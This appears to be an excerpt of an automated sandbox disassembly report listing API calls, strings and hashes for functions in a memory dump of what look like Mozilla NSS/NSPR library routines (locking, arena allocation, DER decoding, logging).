Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

TlsGetValue.KERNEL32 ref: 6C6F7D04
EnterCriticalSection.KERNEL32(?), ref: 6C6F7D1B
realloc.MOZGLUE(-00000050), ref: 6C6F7D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F7DF4
PR_Unlock.NSS3 ref: 6C6F7E0E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 0a09b6a866da0ff8b3177a5c1bb7f268562e4507eee8acfd15db47d4f4fba40a
Instruction ID: 7a8ed99f3908f787969ed271ece31882df7dc049fce64c70dc8e6a7a67e5699d
Opcode Fuzzy Hash: 0a09b6a866da0ff8b3177a5c1bb7f268562e4507eee8acfd15db47d4f4fba40a
Instruction Fuzzy Hash: 6C51D671A09100DFEB206F28DC49AA577F6EB4231DF55813BDA1487712EB30E862CAE5

Function 6C664C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CB0
PR_Unlock.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664D97
PR_Lock.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664DBA
PR_WaitCondVar.NSS3 ref: 6C664DD4
PR_Unlock.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664DEF

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 715bfa3d4c1f20a50163909bb084281c40aadc7bb0c4189ff3c93a276bd55b9c
Instruction ID: abab33edc7d664d45bfad3208771540f8e28be889ea57d13bec983f6a2ee6250
Opcode Fuzzy Hash: 715bfa3d4c1f20a50163909bb084281c40aadc7bb0c4189ff3c93a276bd55b9c
Instruction Fuzzy Hash: 51417DB1A086158FCB20EF79D0985697BF4BF0631CF058679D8489BB01E730D895CBCA

Function 6C7F7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C7F7CE0

Part of subcall function 6C7A9BF0: TlsGetValue.KERNEL32(?,?,?,6C7F0A75), ref: 6C7A9C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F7D36
PR_Realloc.NSS3(?,00000080), ref: 6C7F7D6D
PR_GetCurrentThread.NSS3 ref: 6C7F7D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C7F7DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F7DD8
malloc.MOZGLUE(00000080), ref: 6C7F7DF8
PR_GetCurrentThread.NSS3 ref: 6C7F7E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C7F7DF0
:%s:%d:0x%lx, xrefs: 6C7F7DB9

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: dd16863f413f84255ffe23ce8352943037d8de8e920e701500d246516f55ddcf
Instruction ID: b4b9e3b52352f9eebbb274c0b2f5830fe4fb509ec1ce2ae84684c1267bed3281
Opcode Fuzzy Hash: dd16863f413f84255ffe23ce8352943037d8de8e920e701500d246516f55ddcf
Instruction Fuzzy Hash: 7A41E6B15002059FDB04CF28CED59AB37BAFF84318B65456CE8298BB51D731EC42CBA1

Function 6C7F7E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F7E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C7F7E46

Part of subcall function 6C6D1240: TlsGetValue.KERNEL32(00000040,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1267
Part of subcall function 6C6D1240: EnterCriticalSection.KERNEL32(?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D127C
Part of subcall function 6C6D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1291
Part of subcall function 6C6D1240: PR_Unlock.NSS3(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D12A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C7F7EAF
PR_ImportFile.NSS3(?), ref: 6C7F7ECF
PR_GetCurrentThread.NSS3 ref: 6C7F7ED6
PR_ImportTCPSocket.NSS3(?), ref: 6C7F7F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6C7F7F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6C7F7F15

Strings

%d:0x%lx, xrefs: 6C7F7EA9
NSPR_INHERIT_FDS, xrefs: 6C7F7E41

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: 22a7ee88dac687985783920a6b7318bc0f2f3f361ec89ba81eb757da45743e1b
Instruction ID: be039526eb6fcb8a76add116f14a37de81c18e258b19616aa01af7cc5bab552d
Opcode Fuzzy Hash: 22a7ee88dac687985783920a6b7318bc0f2f3f361ec89ba81eb757da45743e1b
Instruction Fuzzy Hash: E7315471E041199BEB109BA9CAC4EABB7BDFF06348F140936D82593B11E7619C06C7D2

Function 6C704E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C704E90
EnterCriticalSection.KERNEL32 ref: 6C704EA9
TlsGetValue.KERNEL32 ref: 6C704EC6
EnterCriticalSection.KERNEL32 ref: 6C704EDF
PL_HashTableLookup.NSS3 ref: 6C704EF8
PR_Unlock.NSS3 ref: 6C704F05
PR_Now.NSS3 ref: 6C704F13
PR_Unlock.NSS3 ref: 6C704F3A

Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07AD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07CD
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C66204A), ref: 6C6D07D6
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C66204A), ref: 6C6D07E4
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,6C66204A), ref: 6C6D0864
Part of subcall function 6C6D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6D0880
Part of subcall function 6C6D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C66204A), ref: 6C6D08CB
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08D7
Part of subcall function 6C6D07A0: TlsGetValue.KERNEL32(?,?,6C66204A), ref: 6C6D08FB

Strings

bUpl, xrefs: 6C704E5C
bUpl, xrefs: 6C704F3F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUpl$bUpl
API String ID: 326028414-3190182326
Opcode ID: e480c168eab6ff5f51e637297d1d549280d0a27140aa41742a7c34c3f2e32de3
Instruction ID: b5d686f662d1f7a1c1be8175a63ebc7f3f353a4cd269912eee68b569a9132024
Opcode Fuzzy Hash: e480c168eab6ff5f51e637297d1d549280d0a27140aa41742a7c34c3f2e32de3
Instruction Fuzzy Hash: E6415BB4A006059FCB10EF78C1848AABBF0FF49348B058669EC599B711EB30E895CBD1

Function 6C72ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C72DE64), ref: 6C72ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C72ED22

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

PL_FreeArenaPool.NSS3(?), ref: 6C72ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C72ED6B
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C72ED38

Part of subcall function 6C664C70: TlsGetValue.KERNEL32(?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664C97
Part of subcall function 6C664C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CB0
Part of subcall function 6C664C70: PR_Unlock.NSS3(?,?,?,?,?,6C663921,6C8414E4,6C7ACC70), ref: 6C664CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C72ED52
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C72ED83
PL_FreeArenaPool.NSS3(?), ref: 6C72ED95
PL_FinishArenaPool.NSS3(?), ref: 6C72ED9D

Part of subcall function 6C7464F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C74127C,00000000,00000000,00000000), ref: 6C74650E

Strings

security, xrefs: 6C72ED06

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 5c35486ce4ea01fe156a8574dfba16b8008dc06a25a81e83d4b93d701cb91bd4
Instruction ID: 2311729bcaea87319c809a41965e4934d235c06e99437646b39f97eae74626ae
Opcode Fuzzy Hash: 5c35486ce4ea01fe156a8574dfba16b8008dc06a25a81e83d4b93d701cb91bd4
Instruction Fuzzy Hash: 19112B7690421867DB20A775AE4DBBB7278AF0270DF018934E854A2F41F729A70CD6D7

Function 6C712CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C712CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C712D07

Part of subcall function 6C7F09D0: PR_Now.NSS3 ref: 6C7F0A22
Part of subcall function 6C7F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C7F0A35
Part of subcall function 6C7F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C7F0A66
Part of subcall function 6C7F09D0: PR_GetCurrentThread.NSS3 ref: 6C7F0A70
Part of subcall function 6C7F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C7F0A9D
Part of subcall function 6C7F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C7F0AC8
Part of subcall function 6C7F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C7F0AE8
Part of subcall function 6C7F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7F0B19
Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7F0B48
Part of subcall function 6C7F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7F0C76
Part of subcall function 6C7F09D0: PR_LogFlush.NSS3 ref: 6C7F0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C712D22

Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7F0B88
Part of subcall function 6C7F09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7F0C5D
Part of subcall function 6C7F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C7F0C8D
Part of subcall function 6C7F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7F0C9C
Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7F0CD1
Part of subcall function 6C7F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C7F0CEC
Part of subcall function 6C7F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7F0CFB
Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7F0D16
Part of subcall function 6C7F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C7F0D26
Part of subcall function 6C7F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7F0D35
Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C7F0D65
Part of subcall function 6C7F09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C7F0D70
Part of subcall function 6C7F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7F0D90
Part of subcall function 6C7F09D0: free.MOZGLUE(00000000), ref: 6C7F0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C712D3B

Part of subcall function 6C7F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C7F0BAB
Part of subcall function 6C7F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7F0BBA
Part of subcall function 6C7F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7F0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C712D54

Part of subcall function 6C7F09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F0BCB
Part of subcall function 6C7F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7F0BDE
Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7F0C16

Strings

C_InitToken, xrefs: 6C712CE7
slotID = 0x%x, xrefs: 6C712D02
pPin = 0x%p, xrefs: 6C712D1D
pLabel = 0x%p, xrefs: 6C712D4F
ulPinLen = %d, xrefs: 6C712D36

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: c14ccbe5dde529859c1eba0bf70d3ec7af5c6fbbf82aeedeec5103e1f22408b6
Instruction ID: 27604bcdd64a4ddf24d0528074f19760230069f6999f59c86498a55e0733858d
Opcode Fuzzy Hash: c14ccbe5dde529859c1eba0bf70d3ec7af5c6fbbf82aeedeec5103e1f22408b6
Instruction Fuzzy Hash: 7C21A175209144EFDB20EF54DE8DA5A3BB1EB8331EF088534E54497B22DB349849CBA2

Function 6C7F0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C6D2357), ref: 6C7F0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C6D2357), ref: 6C7F0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C7F0EE6

Part of subcall function 6C7F09D0: PR_Now.NSS3 ref: 6C7F0A22
Part of subcall function 6C7F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C7F0A35
Part of subcall function 6C7F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C7F0A66
Part of subcall function 6C7F09D0: PR_GetCurrentThread.NSS3 ref: 6C7F0A70
Part of subcall function 6C7F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C7F0A9D
Part of subcall function 6C7F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C7F0AC8
Part of subcall function 6C7F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C7F0AE8
Part of subcall function 6C7F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7F0B19
Part of subcall function 6C7F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7F0B48
Part of subcall function 6C7F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7F0C76
Part of subcall function 6C7F09D0: PR_LogFlush.NSS3 ref: 6C7F0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C7F0EFA

Part of subcall function 6C6DAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C6DAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F2B

Strings

Aborting, xrefs: 6C7F0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C7F0ED9, 6C7F0EE5, 6C7F0F06, 6C7F0F0B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: e5e12f844af03d05e3d97cf023ff8d7d98793d00544ecf3ab7c50567e6a0c001
Instruction ID: 44c030a425905accd9b9a1ca7c18452a5a8ecc245cf3f0e38f0654573185eb5e
Opcode Fuzzy Hash: e5e12f844af03d05e3d97cf023ff8d7d98793d00544ecf3ab7c50567e6a0c001
Instruction Fuzzy Hash: 39F081BA9001247BDA226BA0DC4DC9B3E2DEF42269F004834FD0D56703EA35E955D6F2

Function 6C754DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C754DCB

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C754DE1

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C754DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C754E59

Part of subcall function 6C73FAB0: free.MOZGLUE(?,-00000001,?,?,6C6DF673,00000000,00000000), ref: 6C73FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C81300C,00000000), ref: 6C754EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C754EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C754F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75521A

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 41d3c80ae5ad5dd56734d9117c4db9f5a90d6095b86d001c2b36db2753aad2f5
Instruction ID: 6ef490fe647f634f394e623aed9105d938d7da1e5288345d66a5898540e54c77
Opcode Fuzzy Hash: 41d3c80ae5ad5dd56734d9117c4db9f5a90d6095b86d001c2b36db2753aad2f5
Instruction Fuzzy Hash: F7F19F71E00209CBDB04CF58E9407ADB7B2FF45358F658129E915AB781EB36E9A1CF90

Function 6C6E4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C830148,?,6C6F6FEC), ref: 6C6E502A
PR_NewLock.NSS3(00000001,00000000,6C830148,?,6C6F6FEC), ref: 6C6E5034
